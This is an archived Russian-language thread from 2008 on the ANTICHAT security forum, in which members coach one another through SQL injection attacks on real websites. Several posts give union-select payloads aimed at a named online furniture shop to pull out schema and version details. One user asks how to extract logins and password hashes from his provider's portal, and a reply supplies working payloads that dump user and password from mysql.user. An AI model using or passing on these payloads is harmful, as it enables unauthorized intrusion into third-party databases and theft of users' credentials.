ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
13.02.2008, 21:05
|
|
Постоянный
Регистрация: 06.12.2006
Сообщений: 321
Провел на форуме:
1536533
Репутация:
370
|
|
kair
http://search.securityfocus.com/swsearch?sbm=%2F&metaname=alldoc&query=OpenSSH+3.9 p1&x=0&y=0
http://search.securityfocus.com/swsearch?query=SSH+1.99&sbm=%2F&submit=Search%21&m etaname=alldoc&sort=swishrank
Ох не знал я, что поисковики отменили.
|
|
|
13.02.2008, 21:06
|
|
Познающий
Регистрация: 22.02.2006
Сообщений: 50
Провел на форуме:
256744
Репутация:
16
|
|
Сообщение от Constantine
m0use кури more than 1 row от Elekt'а , там реально все сделать.
Ветка там 4, таблица users, колонки: id,username,password
А поподробней можно? что за more than 1 row от Elekt'а?
|
|
|
|
13.02.2008, 21:08
|
|
Leaders of Antichat - Level 4
Регистрация: 26.11.2006
Сообщений: 237
Провел на форуме:
13395217
Репутация:
2097
|
|
http://forum.antichat.ru/threadnav35207-1-10.html
__________________
Не занимаюсь коммерцией в любых ее проявлениях.
|
|
|
|
13.02.2008, 21:49
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161
Репутация:
142
|
|
Сообщение от Spyder
а хз чё тебе надо
написали смотреть в исходник- смотрю :Р.там лоад фаил пахал,я и просмотрел исходник.
|
|
|
|
13.02.2008, 22:58
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161
Репутация:
142
|
|
http://www.mebel24.ru/shopinfo.php?id=-22+union+select+0,table_name,2,3,4,5,6,7,8,9,10,11 +from+information_schema.tables/*
что не подставляю, возвращает ошибку с mysql_num_rows(),версию базу и т.д узнать почемуто можно)(
|
|
|
|
13.02.2008, 23:02
|
|
Members of Antichat - Level 5
Регистрация: 24.11.2006
Сообщений: 927
Провел на форуме:
7192869
Репутация:
3033
|
|
Велемир я тебе сказал искать конфиги или исходники авторизации админки. Путь у тебя есть, собрать до нужного файла легко
http://www.mebel24.ru/shopinfo.php?id=-22+union+select+0,version(),2,3,4,5,6,7,8,9,10,11/*
откдуа ты там схему запрашиваешь, ветка старая, информатион_схема только с 5ой ветке
__________________
Дети индиго - это бездари, не надо песен! В пять лет едва говорить начинают, мы в этом возрасте стихи наизусть читали!
з.ы http://www.youtube.com/watch?v=sNsQe0KByRY Я ПлакалЪ
|
|
|
|
13.02.2008, 23:03
|
|
Постоянный
Регистрация: 11.11.2006
Сообщений: 595
Провел на форуме:
1845062
Репутация:
1079
|
|
Версия mysql 4.1.22, там нету базы information_schema
|
|
|
|
13.02.2008, 23:13
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161
Репутация:
142
|
|
Сорь...не знал,*пошёл дальше рыскать*
|
|
|
|
15.02.2008, 14:26
|
|
Познающий
Регистрация: 21.01.2008
Сообщений: 85
Провел на форуме:
839509
Репутация:
338
|
|
Ну чтож почти научился SQL инекций) вот токо у меня не получается вывеси логин с хэшем вот например это портал нашего провайдреа 
Код:
http://*********/portal.php?module=news&view_gid=0x3127%20union+select+1,2,3,4,concat_ws(0x2F,version(),database(),user()),6,7,8/*
Ну это покажет версию, базу и имя, вот я подставлял потом такое значение
Код:
http://*********/portal.php?module=news&view_gid=0x3127%20union+select+1,2,3,4,user,password,6,7,8+from+mysql.user/*
Токо не пошло, можете обяснить что подставить надо?  Статьи прочитал подставлял не полуличось, либо я не понял) |
|
|
|
15.02.2008, 14:31
|
|
Постоянный
Регистрация: 07.02.2006
Сообщений: 630
Провел на форуме:
12985021
Репутация:
676
|
|
CaNNabi$
union select 1,2,3,4,user,6,7,8 from mysql.user/*
либо так
union select 1,2,3,4,concat_ws(0x3a,user,password),6,7,8 from mysql.user/*
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
